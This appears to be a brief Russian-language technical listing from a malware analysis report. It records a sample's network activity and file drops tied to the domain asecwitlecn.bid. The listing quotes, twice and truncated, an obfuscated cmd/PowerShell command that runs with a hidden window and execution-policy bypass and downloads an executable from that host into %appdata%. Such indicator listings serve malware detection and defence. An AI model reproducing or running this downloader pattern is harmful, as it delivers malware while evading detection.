Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OwersHEll.eXE ^-EXe^c^UTiON^PoLiCY ByPas^s^ -n^opRo^fI^lE -^W^INdO^w^s^TYL^e Hi^d^D^en ^(^new-Object^ sysT^e^m.Net.We^bClienT)^.DoWn^lO^Adfi^lE^(^'http://asecwitlecn.bid/...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /C "p^OwersHEll.eXE ^-EXe^c^UTiON^PoLiCY ByPas^s^ -n^opRo^fI^lE -^W^INdO^w^s^TYL^e Hi^d^D^en ^(^new-Object^ sysT^e^m.Net.We^bClienT)^.DoWn^lO^Adfi^lE^(^'http://asecwitlecn.bid/...' (со скрытым окном)